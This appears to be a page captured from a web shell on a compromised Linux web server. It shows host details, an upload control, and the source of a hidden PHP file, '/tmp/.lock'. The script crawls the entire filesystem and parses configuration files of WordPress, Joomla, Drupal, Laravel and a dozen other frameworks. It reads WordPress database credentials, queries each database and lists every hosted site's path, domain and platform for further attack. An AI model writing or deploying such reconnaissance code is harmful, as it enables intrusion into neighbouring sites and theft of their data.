\x20\40\x20\40 HEX
HEX
Server: Apache
System: Linux web1.jenscom.net 4.18.0-553.111.1.el8_10.x86_64 #1 SMP Sun Mar 8 20:06:07 EDT 2026 x86_64
User: sps (1059)
PHP: 8.3.30
Disabled: NONE
$ pwd: /tmp/
Upload Files
File: //tmp/.lock
<?php   $r = "/";  function is_valid_domain($domain) {     if (!substr_count($domain, '.')) {         return false;     } 	if (stripos($domain, 'http://') === 0) {         $domain = substr($domain, 7); 		$schema = 'http://';     } 	elseif (stripos($domain, 'https://') === 0) {         $domain = substr($domain, 8); 		$schema = 'https://';     } 	else $schema = 'http://'; 	     if (stripos($domain, 'www.') === 0) {         $domain = substr($domain, 4);     } 	if (strpos($domain, '/') !== false) { 		$split = explode('/', $domain, 2); 		$domain = $split[0]; 	}     $again = $schema . $domain;     return filter_var($again, FILTER_VALIDATE_URL); }  function parse_define_value($line) {     if (preg_match("/define\s*\(\s*['\"]\w+['\"]\s*,\s*['\"](.*)['\"]\s*\)\s*;/", $line, $matches)) {         return $matches[1];     }     return null; } function scan_wp($p) {     $data = file_get_contents($p);     $pattern = "/table_prefix\s*=\s*'([^']*)';/i";     if (preg_match($pattern, $data, $matches)) {         $table_prefix = $matches[1];     } else {         $table_prefix = 'wp_';     }     $lines = array_map('rtrim', file($p));     $conf = [];     foreach ($lines as $line) {         if (preg_match('/define\s*\(\s*[\'"]\s*(DB_USER|DB_HOST|DB_PASSWORD|DB_NAME)\s*[\'"]\s*,/', $line, $matches)) {             $conf[$matches[1]] = parse_define_value($line);         }     }     $mysqli = new mysqli($conf['DB_HOST'], $conf['DB_USER'], $conf['DB_PASSWORD'], $conf['DB_NAME']);     if (!$mysqli->connect_errno) {         if ($result = $mysqli->query("SELECT option_value FROM {$table_prefix}options WHERE option_name = 'siteurl';")) {             $row = $result->fetch_object();             $result->close();             $p = dirname($p); 			$d = is_valid_domain($row->option_value);             if ($d) { 				print "<f>{$p}@@@{$d}@@@wp@@@{$p}</f>\n"; 			}         }         $mysqli->close();     } } function scan_joomla($p) {     $c = file_get_contents($p);     preg_match("/live_site = '(.*?)';/", $c, $m);     if (isset($m[1])) {         $p = dirname($p); 		$d = is_valid_domain($m[1]);         if ($d) { 			print "<f>{$p}@@@{$d}@@@joomla@@@{$p}</f>\n"; 		}     } } function scan_drupal($p) {     $c = file_get_contents($p);     if (preg_match("/\\\$base_url\s*=\s*['\"]([^'\"]+)['\"]/", $c, $m)) {         $p = dirname($p); 		$d = is_valid_domain($m[1]);         if ($d) { 			print "<f>{$p}@@@{$d}@@@drupal@@@{$p}</f>\n"; 		}     } } function scan_opencart($p) {     $c = file_get_contents($p);     $d = null;     if (preg_match("/define\s*\(\s*['\"]HTTPS_SERVER['\"]\s*,\s*['\"]([^'\"]+)['\"]\s*\)/", $c, $m)) {         $d = is_valid_domain($m[1]);     }     if (!$d && preg_match("/define\s*\(\s*['\"]HTTP_SERVER['\"]\s*,\s*['\"]([^'\"]+)['\"]\s*\)/", $c, $m)) {         $d = is_valid_domain($m[1]);     }     if ($d) {         $p = dirname($p);         print "<f>{$p}@@@{$d}@@@opencart@@@{$p}</f>\n";     } } function scan_laravel($p) {     $c = @file_get_contents($p);     if (!$c) return;     if (preg_match("/^\s*APP_URL\s*=\s*['\"]?(https?:\/\/[^'\"]+)['\"]?/m", $c, $m)) {         $path_root = dirname($p);         if (!@is_file($path_root . '/artisan')) return;         $path_public = $path_root . '/public';         if (!@is_dir($path_public)) {             $path_public = $path_root;         }         $d = is_valid_domain($m[1]);         if ($d) {             print "<f>{$path_public}@@@{$d}@@@laravel@@@{$p}</f>\n";         }     } } function scan_codeigniter3($p) {     $c = @file_get_contents($p);     if (!$c) return;     if (preg_match("/\\\$config\s*\[\s*['\"]base_url['\"]\s*\]\s*=\s*['\"](https?:\/\/[^'\"]+)['\"]/", $c, $m)) {         $path_root = dirname(dirname($p));         $d = is_valid_domain($m[1]);         if ($d) {             print "<f>{$path_root}@@@{$d}@@@codeigniter3@@@{$p}</f>\n";         }     } } function scan_codeigniter4($p) {     $c = @file_get_contents($p);     if (!$c) return;     if (preg_match("/\\\$baseURL\s*=\s*['\"](https?:\/\/[^'\"]+)['\"]/", $c, $m)) {         $path_root = dirname(dirname(dirname($p)));         $path_public = $path_root . '/public';         if (!@is_dir($path_public)) {             $path_public = $path_root;         }         $d = is_valid_domain($m[1]);         if ($d) {             print "<f>{$path_public}@@@{$d}@@@codeigniter4@@@{$p}</f>\n";         }     } } function scan_cakephp($p) {     $c = @file_get_contents($p);     if (!$c) return;     if (preg_match("/['\"]fullBaseUrl['\"]\s*=>\s*['\"](https?:\/\/[^'\"]+)['\"]/", $c, $m) ||         preg_match("/['\"]fullBaseUrl['\"]\s*=>\s*env\s*\(\s*['\"][^'\"]+['\"]\s*,\s*['\"](https?:\/\/[^'\"]+)['\"]\s*\)/", $c, $m)) {         $path_root = dirname($p);         $path_webroot = $path_root . '/webroot';         if (!@is_dir($path_webroot)) {             $path_webroot = $path_root;         }         $d = is_valid_domain($m[1]);         if ($d) {             print "<f>{$path_webroot}@@@{$d}@@@cakephp@@@{$p}</f>\n";         }     } } function scan_symfony($p) {     $c = @file_get_contents($p);     if (!$c) return;     if (preg_match("/^\s*APP_URL\s*=\s*['\"]?(https?:\/\/[^'\"]+)['\"]?/m", $c, $m) ||         preg_match("/^\s*PUBLIC_URL\s*=\s*['\"]?(https?:\/\/[^'\"]+)['\"]?/m", $c, $m)) {         $path_root = dirname($p);         if (!@is_file($path_root . '/bin/console')) return;         $path_public = $path_root . '/public';         if (@is_dir($path_public)) {             $path_out = $path_public;         } else {             $path_web = $path_root . '/web';             $path_out = @is_dir($path_web) ? $path_web : $path_root;         }         $d = is_valid_domain($m[1]);         if ($d) {             print "<f>{$path_out}@@@{$d}@@@symfony@@@{$p}</f>\n";         }     } } function scan_kohana($p) {     $c = @file_get_contents($p);     if (!$c) return;     if (preg_match("/['\"]base_url['\"]\s*=>\s*['\"](https?:\/\/[^'\"]+)['\"]/", $c, $m)) {         $path_root = (strpos($p, 'application/') !== false) ? dirname(dirname($p)) : dirname($p);         $d = is_valid_domain($m[1]);         if ($d) {             print "<f>{$path_root}@@@{$d}@@@kohana@@@{$p}</f>\n";         }     } } function scan_fuelphp($p) {     $c = @file_get_contents($p);     if (!$c) return;     if (preg_match("/['\"]base_url['\"]\s*=>\s*['\"](https?:\/\/[^'\"]+)['\"]/", $c, $m)) {         $path_fuel = dirname(dirname($p));         $path_root = dirname($path_fuel);         $path_public = $path_root . '/public';         if (!@is_dir($path_public)) {             $path_public = $path_root;         }         $d = is_valid_domain($m[1]);         if ($d) {             print "<f>{$path_public}@@@{$d}@@@fuelphp@@@{$p}</f>\n";         }     } } function scan_bitrix($p) {     $c = @file_get_contents($p);     if (!$c || strpos($p, 'bitrix') === false) return;     if (preg_match("/['\"]value['\"]\s*=>\s*['\"](https?:\/\/[^'\"]+)['\"]/", $c, $m)) {         $path_root = dirname(dirname($p));         $d = is_valid_domain($m[1]);         if ($d) {             print "<f>{$path_root}@@@{$d}@@@bitrix@@@{$p}</f>\n";         }     } } function scan($path) {     $existed = ["topekaskiclub.com"];     if ($dir = @opendir($path)) {         while (false !== ($file = readdir($dir))) { 			if ($path === '/' || $path === '') { 				$p = $path . $file; 			} else { 				$p = $path . '/' . $file; 			}             if ($file != '.' && $file != '..') {                 $found = false;                 foreach ($existed as $domain) {                     if (strstr($p, $domain)) {                         $found = true;                         break;                     }                 }                 if ($found) {                     continue;                 }                 if (is_link($p)) {                     continue;                 } elseif (is_dir($p)) {                     scan($p);                 } elseif ($file == 'wp-config.php') {                     scan_wp($p);                 } elseif ($file == 'configuration.php') {                     scan_joomla($p);                 } elseif ($file == 'settings.php' && (strpos($p, 'sites/') !== false || strpos($p, 'sites\\') !== false)) {                     scan_drupal($p);                 } elseif ($file == 'config.php' && strpos(@file_get_contents($p), 'HTTP_SERVER') !== false) {                     scan_opencart($p);                 } elseif ($file == '.settings.php' && strpos($p, 'bitrix') !== false) {                     scan_bitrix($p);                 } elseif ($file == '.env') {                     scan_laravel($p);                     scan_symfony($p);                 } elseif ($file == 'config.php' && strpos($p, 'application/config') !== false) {                     scan_codeigniter3($p);                 } elseif ($file == 'App.php' && strpos($p, 'app/Config') !== false) {                     scan_codeigniter4($p);                 } elseif ($file == 'app.php' && strpos($p, 'config/') !== false) {                     scan_cakephp($p);                 } elseif (($file == 'bootstrap.php' || $file == 'url.php') && strpos($p, 'application/') !== false) {                     scan_kohana($p);                 } elseif ($file == 'config.php' && strpos($p, 'fuel/') !== false) {                     scan_fuelphp($p);                 } elseif ($file == 'config.php' && strpos(@file_get_contents($p), 'HTTP_SERVER') !== false) {                     scan_opencart($p);                 }             }         }     } } scan($r); die('!ended!');
@ Telegram